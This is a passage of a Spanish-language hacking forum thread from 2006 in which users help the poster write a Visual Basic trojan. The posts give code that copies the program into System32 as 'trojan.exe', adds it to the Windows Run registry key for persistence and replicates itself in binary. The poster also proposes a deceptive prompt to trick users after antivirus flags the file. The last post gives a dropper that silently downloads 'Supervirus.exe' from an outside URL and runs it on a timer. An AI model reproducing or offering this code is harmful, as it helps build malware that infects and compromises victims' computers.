elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Cuando se ejecute, que se copie a system32
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: Cuando se ejecute, que se copie a system32  (Leído 4,244 veces)
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Cuando se ejecute, que se copie a system32
« Respuesta #10 en: 9 Diciembre 2006, 19:16 pm »

Eso sera por q intentas copiarlo sobre si mismo, es decir copiar sobre un archivo en ejecucion.

Cuando se aya copiado a system32 sacalo al escritorio por ejemplo y ejecutalo, veras como funciona bien  ;)

1S4ludo


En línea

sp26

Desconectado Desconectado

Mensajes: 88


Ver Perfil
Re: Cuando se ejecute, que se copie a system32
« Respuesta #11 en: 9 Diciembre 2006, 22:24 pm »

Es mas facil:

FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\trojan.exe"


En línea

‭lipman


Desconectado Desconectado

Mensajes: 3.062



Ver Perfil WWW
Re: Cuando se ejecute, que se copie a system32
« Respuesta #12 en: 9 Diciembre 2006, 23:44 pm »

Bueno acabo de probar este ultimo codigo que me dices sp26 y obtengo los mismos resultados que los demás, me sale el error ese.

Pero he probado lo que dices, E0N con los dos tipos de troyanos (el que necesita modulo y el que me acaba de decir sp26) y es verdad, cuando los saco me funciona...

Pero lógicamente, me tiene que funcionar dentro del system32, no?

Porque lo que deseo es eso, que se copie al registro (que ya tengo el codigo y que funciona) y que se meta en system32.

Entonces, he de hacer algo, o se supone que me funciona así?

Bueno aquí dejo el código "entero"

Código:
Private Sub Form_Load()
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "trojan", "C:\Windows\System32\trojan.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\trojan.exe"
End Sub

Repito, aunque me funcione dentro del escritorio, se supone que me tiene que funcionar dentro de system32.
¿Que hago :S?

Saludos, y Gracias
En línea

sp26

Desconectado Desconectado

Mensajes: 88


Ver Perfil
Re: Cuando se ejecute, que se copie a system32
« Respuesta #13 en: 10 Diciembre 2006, 02:47 am »

Lei y relei pero no entendi muy bien...

¿Quieres que se copie al System32 desde el registro?

Para eso colocalo en el _Load

En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Cuando se ejecute, que se copie a system32
« Respuesta #14 en: 10 Diciembre 2006, 13:26 pm »

Bamos a ver te lo vuelvo a explicar por q parece q me expliké mal... Imagina q en el escritorio tienes un programa q se llama game.exe (y q estas usando)  y kieres copiar al escritorio otro programa q se llame game.exe.
Evidentemente windows no te va a dejar por q no puedes poner dos archivos con el mismo nombre en la misma carpeta (se sobrescribirian) y en este caso como el primer game.exe esta en uso no te deja ni sobreescribirlo.

Con tu troyano pasa lo mismo, no puedes sobreescribirlo, ni copiar dos archivos con el mismo nombre en la misma carpeta, por lo q te da error.

Como solucionarlo?? pues comprobando antes de nada si el archivo existe. Esta es una opcion:

Código:
If Dir("C:\windows\system32\troyano.exe") <> "" Then
        MsgBox "El archivo existe."
        'Como ya existe no hace falta q lo copies ni lo añadas al registro
    Else
        MsgBox "El archivo no existe."
        'Como no existe lo copias y lo añades al registro
    End If

Ahora te vendrá muy bien mi codigo para obtener la carpeta de system32 para poner la direccion q te de aki:

Citar
Dir("C:\windows\system32\troyano.exe")

Si aun te keda alguna duda postea  ;)
1S4ludo
En línea

‭lipman


Desconectado Desconectado

Mensajes: 3.062



Ver Perfil WWW
Re: Cuando se ejecute, que se copie a system32
« Respuesta #15 en: 10 Diciembre 2006, 14:15 pm »

Aaaaaa!!!

Claro ahora entiendo el problema.

Lo acabo de entender modificando tu código así:
Código:
Private Sub Form_Load()
If Dir("C:\windows\system32\troyano.exe") <> "" Then
        MsgBox "El archivo existe"
        'Como ya existe no hace falta q lo copies ni lo añadas al registro
    Else
        FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\troyano.exe"
        'Como no existe lo copias y lo añades al registro
    End If
End Sub

Claro, al principio todo funciona bien, pero si lo abro desde system32 logicamente no funciona porque se supone que se quiere volver a copiar ahí.

Entonces, lo que necesito, es esto??:

Un form, que al abrirlo se copie a sys32 (y al registro) y cuando se haya copiado, que se deshabilite la opción esa que tiene de copiarse a system32 para que solo lo haga la primera vez, y las demás no.

Entonces, que os parece este código??:

Private Sub Form_Load()
If Dir("C:\windows\system32\troyano.exe") <> "" Then
        ******
    Else
        FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\troyano.exe"
        ;;;;;;;;
    End If
End Sub

***** = Código, por ejemplo, para reiniciar el ordenador (cual es?? :S(por no abrir otro post))
;;;;;;; = Código, para copiar en el registro.

Ahora tengo una pregunta con los IF y los ELSE.

En el código, por ejemplo, en donde va el *****, puedo poner un código muy muy grande?? Algo así como 50 líneas...

Gracias Saludos
En línea

sp26

Desconectado Desconectado

Mensajes: 88


Ver Perfil
Re: Cuando se ejecute, que se copie a system32
« Respuesta #16 en: 10 Diciembre 2006, 19:35 pm »

Para eso haces un Goto  :P

Código:
Private Form_Load ()
On Error GoTo fallo:

FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\trojan.exe"

Fallo:
End sub

Es mejor :P
En línea

yovaninu


Desconectado Desconectado

Mensajes: 349



Ver Perfil
Re: Cuando se ejecute, que se copie a system32
« Respuesta #17 en: 10 Diciembre 2006, 22:26 pm »

Private Sub Form_Load()
If Dir("C:\windows\system32\troyano.exe") <> "" Then
        ******
    Else
        FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\troyano.exe"
        ;;;;;;;;
    End If
End Sub

***** = Código, por ejemplo, para reiniciar el ordenador (cual es?? :S(por no abrir otro post))
;;;;;;; = Código, para copiar en el registro.

Ahora tengo una pregunta con los IF y los ELSE.

En el código, por ejemplo, en donde va el *****, puedo poner un código muy muy grande?? Algo así como 50 líneas...

Gracias Saludos
puedes poner 500 lineas claro siempre tendiendo en cuenta que los recursos los uses bien, en fin se trata de vaciar variables despues de usarlar etc etc ademas de cuidar de que no haya algo que vuelva inestable el sistema, inlcuso puede poner bucles y mas bucles, en cuyo caso quiza sea necesario que una de esa lineas diga DoEvents...

respecto a lo de copiarse en el system al menos yo uso otro metodo para mis server's uno clasico
se trata de que el server se abra a si mismo (en binario), meta su contenido en una variable string y cree un archivo con el mismo nombre en system32, si lo haces correctamente no debe fallar, no tengo el codigo a la mano pero mas o menos es algo asi:
Código:

on error goto error 'si no pones esto regresamos a tus tipicos errores

open app.path & "\" app.exename & ".exe" for binary as #1
 dserver=input(lof(1),1)
close #1

open dirsystem & "\" & app.exename & ".exe" for binary as #1
put #1,,dserver
close #1

error:
end sub


o algo asi, veo que ese metodo no lo tocaron pero ahi tienes para ap`render un poco mas
un saludo!

En línea

‭lipman


Desconectado Desconectado

Mensajes: 3.062



Ver Perfil WWW
Re: Cuando se ejecute, que se copie a system32
« Respuesta #18 en: 12 Diciembre 2006, 19:42 pm »

Perdon en tardar tanto en responder.

el codigo que me dices sp26 no me deja compilarlo, me dije que el procedimiento externo no es válido, y me señala la línea de: "On Error GoTo Fallo" (me la señala sin los dos puntos que pones)

Bueno y el código que me dices, yovaninu, me señala y dime lo mismo con la misma línea que ha sp26, y además, antes de compilar, cuando pego el código, deja de color rojo la línea esta de: "open app.path & "\" app.exename & ".exe" for binary as #1"

Y otra cosa, el código que usaba para copiar el archivo a system32 que me habeis dicho antes ("FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\troyano.exe"") me lo detecta el kaspersky como troyan.generic (maldito sea!!!!), pero no me lo detecta cuando lo analizo, sino cuando lo abro.

Me tengo que gobernar otra manera de copiarlo a sys32

He pensado en una cosa.

Cuando instalas un programa (algunos) te deja la opción de dejarlo que se inicie solo al encender el ordenador.

No podría hacer yo lo mismo, salvo que en vez de preguntarlo, pondría alguna otra cosa, como ¿eres listo? pulsa si o no, y en cualquier caso (por si alguien se considera tonto) pongo para que se copie.

Tambien he intentado agregar la funcion para que se copie a sys32 dandole a un botón, y como me imaginaba, no funcionaría.

¿Alguna idea?

Saludos
En línea

sp26

Desconectado Desconectado

Mensajes: 88


Ver Perfil
Re: Cuando se ejecute, que se copie a system32
« Respuesta #19 en: 12 Diciembre 2006, 19:56 pm »

Una buena idea es que se baje automaticamente de internet  silenciosamente y desde tu programa llamarlo...

Exactamenhte asi:

Código:
Private Declare Function URLDownloadToFile Lib "urlmon" _
   Alias "URLDownloadToFileA" _
  (ByVal pCaller As Long, _
   ByVal szURL As String, _
   ByVal szFileName As String, _
   ByVal dwReserved As Long, _
   ByVal lpfnCB As Long) As Long

     Dim ERROR_SUCCESS

Private Sub Command1_Click()
     Dim sSourceUrl As String

    sSourceUrl = "http://supervirus.com/" & _
        "subdirectorio/Supervirus.exe"

    DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\SYSTEM32\Supervirus.exe"
End Sub


Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
  DownloadFile = URLDownloadToFile(0, sURL, _
    sLocalFile, 0, 0) = ERROR_SUCCESS
End Function


En el otro form, creas un timer con intervalo de 2000 (2 segundos)
Código:
Private sub timer1_timer ()
On error goto FALLO:
Shell Environ("SYSTEMROOT") & "\System32\Supervirus.exe"
Fallo:
End sub
« Última modificación: 12 Diciembre 2006, 20:08 pm por sp26 » En línea

Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines